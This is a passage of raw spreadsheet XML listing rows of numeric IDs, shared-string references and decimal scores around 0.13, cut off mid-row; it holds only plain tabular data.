      <c r="E25667" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25667" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="25668" ht="15.75" customHeight="1">
      <c r="A25668" s="1">
        <v>29579.0</v>
      </c>
      <c r="B25668" s="2">
        <v>3.3431936E7</v>
      </c>
      <c r="C25668" s="2" t="s">
        <v>24685</v>
      </c>
      <c r="D25668" s="2">
        <v>1.0</v>
      </c>
      <c r="E25668" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25668" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="25669" ht="15.75" customHeight="1">
      <c r="A25669" s="1">
        <v>29929.0</v>
      </c>
      <c r="B25669" s="2">
        <v>3607052.0</v>
      </c>
      <c r="C25669" s="2" t="s">
        <v>24686</v>
      </c>
      <c r="D25669" s="2">
        <v>1.0</v>
      </c>
      <c r="E25669" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25669" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="25670" ht="15.75" customHeight="1">
      <c r="A25670" s="1">
        <v>31911.0</v>
      </c>
      <c r="B25670" s="2">
        <v>5299202.0</v>
      </c>
      <c r="C25670" s="5" t="s">
        <v>24687</v>
      </c>
      <c r="D25670" s="2">
        <v>1.0</v>
      </c>
      <c r="E25670" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25670" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="25671" ht="15.75" customHeight="1">
      <c r="A25671" s="1">
        <v>32639.0</v>
      </c>
      <c r="B25671" s="2">
        <v>5857361.0</v>
      </c>
      <c r="C25671" s="2" t="s">
        <v>24688</v>
      </c>
      <c r="D25671" s="2">
        <v>1.0</v>
      </c>
      <c r="E25671" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25671" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="25672" ht="15.75" customHeight="1">
      <c r="A25672" s="1">
        <v>32888.0</v>
      </c>
      <c r="B25672" s="2">
        <v>6368665.0</v>
      </c>
      <c r="C25672" s="2" t="s">
        <v>24689</v>
      </c>
      <c r="D25672" s="2">
        <v>1.0</v>
      </c>
      <c r="E25672" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25672" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="25673" ht="15.75" customHeight="1">
      <c r="A25673" s="1">
        <v>33590.0</v>
      </c>
      <c r="B25673" s="2">
        <v>8325752.0</v>
      </c>
      <c r="C25673" s="2" t="s">
        <v>24690</v>
      </c>
      <c r="D25673" s="2">
        <v>1.0</v>
      </c>
      <c r="E25673" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25673" s="2">
        <v>0.1361111111111111</v>
      </c>
    </row>
    <row r="25674" ht="15.75" customHeight="1">
      <c r="A25674" s="1">
        <v>31224.0</v>
      </c>
      <c r="B25674" s="2">
        <v>4926400.0</v>
      </c>
      <c r="C25674" s="2" t="s">
        <v>24691</v>
      </c>
      <c r="D25674" s="2">
        <v>1.0</v>
      </c>
      <c r="E25674" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25674" s="2">
        <v>0.1357012750455374</v>
      </c>
    </row>
    <row r="25675" ht="15.75" customHeight="1">
      <c r="A25675" s="1">
        <v>30101.0</v>
      </c>
      <c r="B25675" s="2">
        <v>3.6541924E7</v>
      </c>
      <c r="C25675" s="2" t="s">
        <v>24692</v>
      </c>
      <c r="D25675" s="2">
        <v>1.0</v>
      </c>
      <c r="E25675" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25675" s="2">
        <v>0.1354775828460039</v>
      </c>
    </row>
    <row r="25676" ht="15.75" customHeight="1">
      <c r="A25676" s="1">
        <v>6543.0</v>
      </c>
      <c r="B25676" s="2">
        <v>4.8854031E7</v>
      </c>
      <c r="C25676" s="2" t="s">
        <v>24693</v>
      </c>
      <c r="D25676" s="2">
        <v>1.0</v>
      </c>
      <c r="E25676" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25676" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="25677" ht="15.75" customHeight="1">
      <c r="A25677" s="1">
        <v>16145.0</v>
      </c>
      <c r="B25677" s="2">
        <v>4.557694E7</v>
      </c>
      <c r="C25677" s="2" t="s">
        <v>24694</v>
      </c>
      <c r="D25677" s="2">
        <v>1.0</v>
      </c>
      <c r="E25677" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25677" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="25678" ht="15.75" customHeight="1">
      <c r="A25678" s="1">
        <v>20511.0</v>
      </c>
      <c r="B25678" s="2">
        <v>1.3047686E7</v>
      </c>
      <c r="C25678" s="2" t="s">
        <v>24695</v>
      </c>
      <c r="D25678" s="2">
        <v>1.0</v>
      </c>
      <c r="E25678" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25678" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="25679" ht="15.75" customHeight="1">
      <c r="A25679" s="1">
        <v>22904.0</v>
      </c>
      <c r="B25679" s="2">
        <v>4.8142689E7</v>
      </c>
      <c r="C25679" s="2" t="s">
        <v>24696</v>
      </c>
      <c r="D25679" s="2">
        <v>1.0</v>
      </c>
      <c r="E25679" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25679" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="25680" ht="15.75" customHeight="1">
      <c r="A25680" s="1">
        <v>23099.0</v>
      </c>
      <c r="B25680" s="2">
        <v>5081479.0</v>
      </c>
      <c r="C25680" s="2" t="s">
        <v>24697</v>
      </c>
      <c r="D25680" s="2">
        <v>1.0</v>
      </c>
      <c r="E25680" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25680" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="25681" ht="15.75" customHeight="1">
      <c r="A25681" s="1">
        <v>23418.0</v>
      </c>
      <c r="B25681" s="2">
        <v>5621989.0</v>
      </c>
      <c r="C25681" s="2" t="s">
        <v>24698</v>
      </c>
      <c r="D25681" s="2">
        <v>1.0</v>
      </c>
      <c r="E25681" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25681" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="25682" ht="15.75" customHeight="1">
      <c r="A25682" s="1">
        <v>23966.0</v>
      </c>
      <c r="B25682" s="2">
        <v>9027697.0</v>
      </c>
      <c r="C25682" s="2" t="s">
        <v>24699</v>
      </c>
      <c r="D25682" s="2">
        <v>1.0</v>
      </c>
      <c r="E25682" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25682" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="25683" ht="15.75" customHeight="1">
      <c r="A25683" s="1">
        <v>24009.0</v>
      </c>
      <c r="B25683" s="2">
        <v>9284830.0</v>
      </c>
      <c r="C25683" s="2" t="s">
        <v>24700</v>
      </c>
      <c r="D25683" s="2">
        <v>1.0</v>
      </c>
      <c r="E25683" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25683" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="25684" ht="15.75" customHeight="1">
      <c r="A25684" s="1">
        <v>24269.0</v>
      </c>
      <c r="B25684" s="2">
        <v>1.052486E7</v>
      </c>
      <c r="C25684" s="2" t="s">
        <v>24701</v>
      </c>
      <c r="D25684" s="2">
        <v>1.0</v>
      </c>
      <c r="E25684" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25684" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="25685" ht="15.75" customHeight="1">
      <c r="A25685" s="1">
        <v>25145.0</v>
      </c>
      <c r="B25685" s="2">
        <v>1.3047685E7</v>
      </c>
      <c r="C25685" s="2" t="s">
        <v>24695</v>
      </c>
      <c r="D25685" s="2">
        <v>1.0</v>
      </c>
      <c r="E25685" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25685" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="25686" ht="15.75" customHeight="1">
      <c r="A25686" s="1">
        <v>25799.0</v>
      </c>
      <c r="B25686" s="2">
        <v>1.4674387E7</v>
      </c>
      <c r="C25686" s="2" t="s">
        <v>24702</v>
      </c>
      <c r="D25686" s="2">
        <v>1.0</v>
      </c>
      <c r="E25686" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25686" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="25687" ht="15.75" customHeight="1">
      <c r="A25687" s="1">
        <v>26486.0</v>
      </c>
      <c r="B25687" s="2">
        <v>1.7505018E7</v>
      </c>
      <c r="C25687" s="2" t="s">
        <v>24703</v>
      </c>
      <c r="D25687" s="2">
        <v>1.0</v>
      </c>
      <c r="E25687" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25687" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="25688" ht="15.75" customHeight="1">
      <c r="A25688" s="1">
        <v>32242.0</v>
      </c>
      <c r="B25688" s="2">
        <v>5503812.0</v>
      </c>
      <c r="C25688" s="2" t="s">
        <v>24704</v>
      </c>
      <c r="D25688" s="2">
        <v>1.0</v>
      </c>
      <c r="E25688" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25688" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="25689" ht="15.75" customHeight="1">
      <c r="A25689" s="1">
        <v>32389.0</v>
      </c>
      <c r="B25689" s="2">
        <v>5621988.0</v>
      </c>
      <c r="C25689" s="2" t="s">
        <v>24698</v>
      </c>
      <c r="D25689" s="2">
        <v>1.0</v>
      </c>
      <c r="E25689" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25689" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="25690" ht="15.75" customHeight="1">
      <c r="A25690" s="1">
        <v>32829.0</v>
      </c>
      <c r="B25690" s="2">
        <v>6238337.0</v>
      </c>
      <c r="C25690" s="2" t="s">
        <v>24705</v>
      </c>
      <c r="D25690" s="2">
        <v>1.0</v>
      </c>
      <c r="E25690" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25690" s="2">
        <v>0.1352201257861635</v>
      </c>
    </row>
    <row r="25691" ht="15.75" customHeight="1">
      <c r="A25691" s="1">
        <v>27227.0</v>
      </c>
      <c r="B25691" s="2">
        <v>2.1004809E7</v>
      </c>
      <c r="C25691" s="2" t="s">
        <v>24706</v>
      </c>
      <c r="D25691" s="2">
        <v>1.0</v>
      </c>
      <c r="E25691" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25691" s="2">
        <v>0.1351575456053069</v>
      </c>
    </row>
    <row r="25692" ht="15.75" customHeight="1">
      <c r="A25692" s="1">
        <v>25480.0</v>
      </c>
      <c r="B25692" s="2">
        <v>1.4026221E7</v>
      </c>
      <c r="C25692" s="2" t="s">
        <v>24707</v>
      </c>
      <c r="D25692" s="2">
        <v>1.0</v>
      </c>
      <c r="E25692" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25692" s="2">
        <v>0.1350574712643679</v>
      </c>
    </row>
    <row r="25693" ht="15.75" customHeight="1">
      <c r="A25693" s="1">
        <v>30177.0</v>
      </c>
      <c r="B25693" s="2">
        <v>3.7154027E7</v>
      </c>
      <c r="C25693" s="2" t="s">
        <v>24708</v>
      </c>
      <c r="D25693" s="2">
        <v>1.0</v>
      </c>
      <c r="E25693" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25693" s="2">
        <v>0.1350574712643679</v>
      </c>
    </row>
    <row r="25694" ht="15.75" customHeight="1">
      <c r="A25694" s="1">
        <v>19230.0</v>
      </c>
      <c r="B25694" s="2">
        <v>5.506E7</v>
      </c>
      <c r="C25694" s="2" t="s">
        <v>24709</v>
      </c>
      <c r="D25694" s="2">
        <v>1.0</v>
      </c>
      <c r="E25694" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25694" s="2">
        <v>0.1350574712643678</v>
      </c>
    </row>
    <row r="25695" ht="15.75" customHeight="1">
      <c r="A25695" s="1">
        <v>34018.0</v>
      </c>
      <c r="B25695" s="2">
        <v>9512074.0</v>
      </c>
      <c r="C25695" s="2" t="s">
        <v>24710</v>
      </c>
      <c r="D25695" s="2">
        <v>1.0</v>
      </c>
      <c r="E25695" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25695" s="2">
        <v>0.1350574712643678</v>
      </c>
    </row>
    <row r="25696" ht="15.75" customHeight="1">
      <c r="A25696" s="1">
        <v>10629.0</v>
      </c>
      <c r="B25696" s="2">
        <v>1.3930965E7</v>
      </c>
      <c r="C25696" s="2" t="s">
        <v>24711</v>
      </c>
      <c r="D25696" s="2">
        <v>1.0</v>
      </c>
      <c r="E25696" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25696" s="2">
        <v>0.134920634920635</v>
      </c>
    </row>
    <row r="25697" ht="15.75" customHeight="1">
      <c r="A25697" s="1">
        <v>23021.0</v>
      </c>
      <c r="B25697" s="2">
        <v>4995757.0</v>
      </c>
      <c r="C25697" s="2" t="s">
        <v>24712</v>
      </c>
      <c r="D25697" s="2">
        <v>1.0</v>
      </c>
      <c r="E25697" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25697" s="2">
        <v>0.1347736625514403</v>
      </c>
    </row>
    <row r="25698" ht="15.75" customHeight="1">
      <c r="A25698" s="1">
        <v>25985.0</v>
      </c>
      <c r="B25698" s="2">
        <v>1.5324548E7</v>
      </c>
      <c r="C25698" s="2" t="s">
        <v>24713</v>
      </c>
      <c r="D25698" s="2">
        <v>1.0</v>
      </c>
      <c r="E25698" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25698" s="2">
        <v>0.1346516007532957</v>
      </c>
    </row>
    <row r="25699" ht="15.75" customHeight="1">
      <c r="A25699" s="1">
        <v>6530.0</v>
      </c>
      <c r="B25699" s="2">
        <v>4.8828599E7</v>
      </c>
      <c r="C25699" s="2" t="s">
        <v>24714</v>
      </c>
      <c r="D25699" s="2">
        <v>1.0</v>
      </c>
      <c r="E25699" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25699" s="2">
        <v>0.1345486111111112</v>
      </c>
    </row>
    <row r="25700" ht="15.75" customHeight="1">
      <c r="A25700" s="1">
        <v>23983.0</v>
      </c>
      <c r="B25700" s="2">
        <v>9118766.0</v>
      </c>
      <c r="C25700" s="2" t="s">
        <v>24715</v>
      </c>
      <c r="D25700" s="2">
        <v>1.0</v>
      </c>
      <c r="E25700" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25700" s="2">
        <v>0.1345486111111112</v>
      </c>
    </row>
    <row r="25701" ht="15.75" customHeight="1">
      <c r="A25701" s="1">
        <v>2895.0</v>
      </c>
      <c r="B25701" s="2">
        <v>3.5727611E7</v>
      </c>
      <c r="C25701" s="2" t="s">
        <v>24716</v>
      </c>
      <c r="D25701" s="2">
        <v>1.0</v>
      </c>
      <c r="E25701" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25701" s="2">
        <v>0.1342592592592593</v>
      </c>
    </row>
    <row r="25702" ht="15.75" customHeight="1">
      <c r="A25702" s="1">
        <v>21334.0</v>
      </c>
      <c r="B25702" s="2">
        <v>2.1066131E7</v>
      </c>
      <c r="C25702" s="2" t="s">
        <v>24717</v>
      </c>
      <c r="D25702" s="2">
        <v>1.0</v>
      </c>
      <c r="E25702" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25702" s="2">
        <v>0.1342592592592593</v>
      </c>
    </row>
    <row r="25703" ht="15.75" customHeight="1">
      <c r="A25703" s="1">
        <v>23217.0</v>
      </c>
      <c r="B25703" s="2">
        <v>5277023.0</v>
      </c>
      <c r="C25703" s="2" t="s">
        <v>24718</v>
      </c>
      <c r="D25703" s="2">
        <v>1.0</v>
      </c>
      <c r="E25703" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25703" s="2">
        <v>0.1342592592592593</v>
      </c>
    </row>
    <row r="25704" ht="15.75" customHeight="1">
      <c r="A25704" s="1">
        <v>25020.0</v>
      </c>
      <c r="B25704" s="2">
        <v>1.2782006E7</v>
      </c>
      <c r="C25704" s="2" t="s">
        <v>24719</v>
      </c>
      <c r="D25704" s="2">
        <v>1.0</v>
      </c>
      <c r="E25704" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25704" s="2">
        <v>0.1342592592592593</v>
      </c>
    </row>
    <row r="25705" ht="15.75" customHeight="1">
      <c r="A25705" s="1">
        <v>7704.0</v>
      </c>
      <c r="B25705" s="2">
        <v>5.1994585E7</v>
      </c>
      <c r="C25705" s="2" t="s">
        <v>24720</v>
      </c>
      <c r="D25705" s="2">
        <v>1.0</v>
      </c>
      <c r="E25705" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25705" s="2">
        <v>0.1339285714285715</v>
      </c>
    </row>
    <row r="25706" ht="15.75" customHeight="1">
      <c r="A25706" s="1">
        <v>17666.0</v>
      </c>
      <c r="B25706" s="2">
        <v>5.0448372E7</v>
      </c>
      <c r="C25706" s="2" t="s">
        <v>24721</v>
      </c>
      <c r="D25706" s="2">
        <v>1.0</v>
      </c>
      <c r="E25706" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25706" s="2">
        <v>0.1339285714285715</v>
      </c>
    </row>
    <row r="25707" ht="15.75" customHeight="1">
      <c r="A25707" s="1">
        <v>15790.0</v>
      </c>
      <c r="B25707" s="2">
        <v>4.4208931E7</v>
      </c>
      <c r="C25707" s="2" t="s">
        <v>24722</v>
      </c>
      <c r="D25707" s="2">
        <v>1.0</v>
      </c>
      <c r="E25707" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25707" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="25708" ht="15.75" customHeight="1">
      <c r="A25708" s="1">
        <v>18454.0</v>
      </c>
      <c r="B25708" s="2">
        <v>5.2801516E7</v>
      </c>
      <c r="C25708" s="2" t="s">
        <v>24723</v>
      </c>
      <c r="D25708" s="2">
        <v>1.0</v>
      </c>
      <c r="E25708" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25708" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="25709" ht="15.75" customHeight="1">
      <c r="A25709" s="1">
        <v>19598.0</v>
      </c>
      <c r="B25709" s="2">
        <v>5.6182858E7</v>
      </c>
      <c r="C25709" s="2" t="s">
        <v>24724</v>
      </c>
      <c r="D25709" s="2">
        <v>1.0</v>
      </c>
      <c r="E25709" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25709" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="25710" ht="15.75" customHeight="1">
      <c r="A25710" s="1">
        <v>23307.0</v>
      </c>
      <c r="B25710" s="2">
        <v>5.4124276E7</v>
      </c>
      <c r="C25710" s="2" t="s">
        <v>24725</v>
      </c>
      <c r="D25710" s="2">
        <v>1.0</v>
      </c>
      <c r="E25710" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25710" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="25711" ht="15.75" customHeight="1">
      <c r="A25711" s="1">
        <v>23643.0</v>
      </c>
      <c r="B25711" s="2">
        <v>6693569.0</v>
      </c>
      <c r="C25711" s="2" t="s">
        <v>24726</v>
      </c>
      <c r="D25711" s="2">
        <v>1.0</v>
      </c>
      <c r="E25711" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25711" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="25712" ht="15.75" customHeight="1">
      <c r="A25712" s="1">
        <v>25688.0</v>
      </c>
      <c r="B25712" s="2">
        <v>1.4524834E7</v>
      </c>
      <c r="C25712" s="2" t="s">
        <v>24727</v>
      </c>
      <c r="D25712" s="2">
        <v>1.0</v>
      </c>
      <c r="E25712" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25712" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="25713" ht="15.75" customHeight="1">
      <c r="A25713" s="1">
        <v>31025.0</v>
      </c>
      <c r="B25713" s="2">
        <v>4.7792028E7</v>
      </c>
      <c r="C25713" s="2" t="s">
        <v>24728</v>
      </c>
      <c r="D25713" s="2">
        <v>1.0</v>
      </c>
      <c r="E25713" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25713" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="25714" ht="15.75" customHeight="1">
      <c r="A25714" s="1">
        <v>32131.0</v>
      </c>
      <c r="B25714" s="2">
        <v>5.4124275E7</v>
      </c>
      <c r="C25714" s="2" t="s">
        <v>24725</v>
      </c>
      <c r="D25714" s="2">
        <v>1.0</v>
      </c>
      <c r="E25714" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25714" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="25715" ht="15.75" customHeight="1">
      <c r="A25715" s="1">
        <v>32725.0</v>
      </c>
      <c r="B25715" s="2">
        <v>5997629.0</v>
      </c>
      <c r="C25715" s="2" t="s">
        <v>24729</v>
      </c>
      <c r="D25715" s="2">
        <v>1.0</v>
      </c>
      <c r="E25715" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25715" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="25716" ht="15.75" customHeight="1">
      <c r="A25716" s="1">
        <v>32772.0</v>
      </c>
      <c r="B25716" s="2">
        <v>6077446.0</v>
      </c>
      <c r="C25716" s="2" t="s">
        <v>24730</v>
      </c>
      <c r="D25716" s="2">
        <v>1.0</v>
      </c>
      <c r="E25716" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25716" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="25717" ht="15.75" customHeight="1">
      <c r="A25717" s="1">
        <v>32940.0</v>
      </c>
      <c r="B25717" s="2">
        <v>6461703.0</v>
      </c>
      <c r="C25717" s="2" t="s">
        <v>24623</v>
      </c>
      <c r="D25717" s="2">
        <v>1.0</v>
      </c>
      <c r="E25717" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25717" s="2">
        <v>0.1338797814207651</v>
      </c>
    </row>
    <row r="25718" ht="15.75" customHeight="1">
      <c r="A25718" s="1">
        <v>24594.0</v>
      </c>
      <c r="B25718" s="2">
        <v>1.1385989E7</v>
      </c>
      <c r="C25718" s="2" t="s">
        <v>24731</v>
      </c>
      <c r="D25718" s="2">
        <v>1.0</v>
      </c>
      <c r="E25718" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25718" s="2">
        <v>0.1335282651072126</v>
      </c>
    </row>
    <row r="25719" ht="15.75" customHeight="1">
      <c r="A25719" s="1">
        <v>26926.0</v>
      </c>
      <c r="B25719" s="2">
        <v>1.9427156E7</v>
      </c>
      <c r="C25719" s="2" t="s">
        <v>24732</v>
      </c>
      <c r="D25719" s="2">
        <v>1.0</v>
      </c>
      <c r="E25719" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25719" s="2">
        <v>0.1335282651072125</v>
      </c>
    </row>
    <row r="25720" ht="15.75" customHeight="1">
      <c r="A25720" s="1">
        <v>22741.0</v>
      </c>
      <c r="B25720" s="2">
        <v>4.4154427E7</v>
      </c>
      <c r="C25720" s="2" t="s">
        <v>24733</v>
      </c>
      <c r="D25720" s="2">
        <v>1.0</v>
      </c>
      <c r="E25720" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25720" s="2">
        <v>0.1335125448028674</v>
      </c>
    </row>
    <row r="25721" ht="15.75" customHeight="1">
      <c r="A25721" s="1">
        <v>28530.0</v>
      </c>
      <c r="B25721" s="2">
        <v>2.6757394E7</v>
      </c>
      <c r="C25721" s="2" t="s">
        <v>24734</v>
      </c>
      <c r="D25721" s="2">
        <v>1.0</v>
      </c>
      <c r="E25721" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25721" s="2">
        <v>0.1335125448028674</v>
      </c>
    </row>
    <row r="25722" ht="15.75" customHeight="1">
      <c r="A25722" s="1">
        <v>28517.0</v>
      </c>
      <c r="B25722" s="2">
        <v>2.6756364E7</v>
      </c>
      <c r="C25722" s="2" t="s">
        <v>24735</v>
      </c>
      <c r="D25722" s="2">
        <v>1.0</v>
      </c>
      <c r="E25722" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25722" s="2">
        <v>0.1331417624521073</v>
      </c>
    </row>
    <row r="25723" ht="15.75" customHeight="1">
      <c r="A25723" s="1">
        <v>30367.0</v>
      </c>
      <c r="B25723" s="2">
        <v>3.8387431E7</v>
      </c>
      <c r="C25723" s="2" t="s">
        <v>24736</v>
      </c>
      <c r="D25723" s="2">
        <v>1.0</v>
      </c>
      <c r="E25723" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25723" s="2">
        <v>0.1331236897274633</v>
      </c>
    </row>
    <row r="25724" ht="15.75" customHeight="1">
      <c r="A25724" s="1">
        <v>14479.0</v>
      </c>
      <c r="B25724" s="2">
        <v>3.9540886E7</v>
      </c>
      <c r="C25724" s="2" t="s">
        <v>24737</v>
      </c>
      <c r="D25724" s="2">
        <v>1.0</v>
      </c>
      <c r="E25724" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25724" s="2">
        <v>0.1328502415458938</v>
      </c>
    </row>
    <row r="25725" ht="15.75" customHeight="1">
      <c r="A25725" s="1">
        <v>25005.0</v>
      </c>
      <c r="B25725" s="2">
        <v>1.2721521E7</v>
      </c>
      <c r="C25725" s="2" t="s">
        <v>24738</v>
      </c>
      <c r="D25725" s="2">
        <v>1.0</v>
      </c>
      <c r="E25725" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25725" s="2">
        <v>0.1328125000000001</v>
      </c>
    </row>
    <row r="25726" ht="15.75" customHeight="1">
      <c r="A25726" s="1">
        <v>33253.0</v>
      </c>
      <c r="B25726" s="2">
        <v>7361667.0</v>
      </c>
      <c r="C25726" s="2" t="s">
        <v>24739</v>
      </c>
      <c r="D25726" s="2">
        <v>1.0</v>
      </c>
      <c r="E25726" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25726" s="2">
        <v>0.1327683615819209</v>
      </c>
    </row>
    <row r="25727" ht="15.75" customHeight="1">
      <c r="A25727" s="1">
        <v>300.0</v>
      </c>
      <c r="B25727" s="2">
        <v>1.5508655E7</v>
      </c>
      <c r="C25727" s="2" t="s">
        <v>24740</v>
      </c>
      <c r="D25727" s="2">
        <v>1.0</v>
      </c>
      <c r="E25727" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25727" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="25728" ht="15.75" customHeight="1">
      <c r="A25728" s="1">
        <v>4518.0</v>
      </c>
      <c r="B25728" s="2">
        <v>4.2607757E7</v>
      </c>
      <c r="C25728" s="2" t="s">
        <v>24741</v>
      </c>
      <c r="D25728" s="2">
        <v>1.0</v>
      </c>
      <c r="E25728" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25728" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="25729" ht="15.75" customHeight="1">
      <c r="A25729" s="1">
        <v>8768.0</v>
      </c>
      <c r="B25729" s="2">
        <v>5.4583818E7</v>
      </c>
      <c r="C25729" s="2" t="s">
        <v>24742</v>
      </c>
      <c r="D25729" s="2">
        <v>1.0</v>
      </c>
      <c r="E25729" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25729" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="25730" ht="15.75" customHeight="1">
      <c r="A25730" s="1">
        <v>11373.0</v>
      </c>
      <c r="B25730" s="2">
        <v>2.1416588E7</v>
      </c>
      <c r="C25730" s="2" t="s">
        <v>24743</v>
      </c>
      <c r="D25730" s="2">
        <v>1.0</v>
      </c>
      <c r="E25730" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25730" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="25731" ht="15.75" customHeight="1">
      <c r="A25731" s="1">
        <v>20728.0</v>
      </c>
      <c r="B25731" s="2">
        <v>1.4674388E7</v>
      </c>
      <c r="C25731" s="2" t="s">
        <v>24744</v>
      </c>
      <c r="D25731" s="2">
        <v>1.0</v>
      </c>
      <c r="E25731" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25731" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="25732" ht="15.75" customHeight="1">
      <c r="A25732" s="1">
        <v>21090.0</v>
      </c>
      <c r="B25732" s="2">
        <v>1.80598E7</v>
      </c>
      <c r="C25732" s="2" t="s">
        <v>24745</v>
      </c>
      <c r="D25732" s="2">
        <v>1.0</v>
      </c>
      <c r="E25732" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25732" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="25733" ht="15.75" customHeight="1">
      <c r="A25733" s="1">
        <v>22529.0</v>
      </c>
      <c r="B25733" s="2">
        <v>3.7772062E7</v>
      </c>
      <c r="C25733" s="2" t="s">
        <v>24746</v>
      </c>
      <c r="D25733" s="2">
        <v>1.0</v>
      </c>
      <c r="E25733" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25733" s="2">
        <v>0.132716049382716</v>
      </c>
    </row>
    <row r="25734" ht="15.75" customHeight="1">
      <c r="A25734" s="1">
        <v>22541.0</v>
      </c>
      <c r="B25734" s="2">
        <v>3.8037295E7</v>
      </c>
      <c r="C25734" s="2" t="s">
        <v>24747</v>
      </c>
      <c r="D25734" s="2">
        <v>1.0</v>
      </c>
      <c r="E25734" s="3" t="s">
        <v>24318</v>
      </c>
      <c r="F25734" s="2">
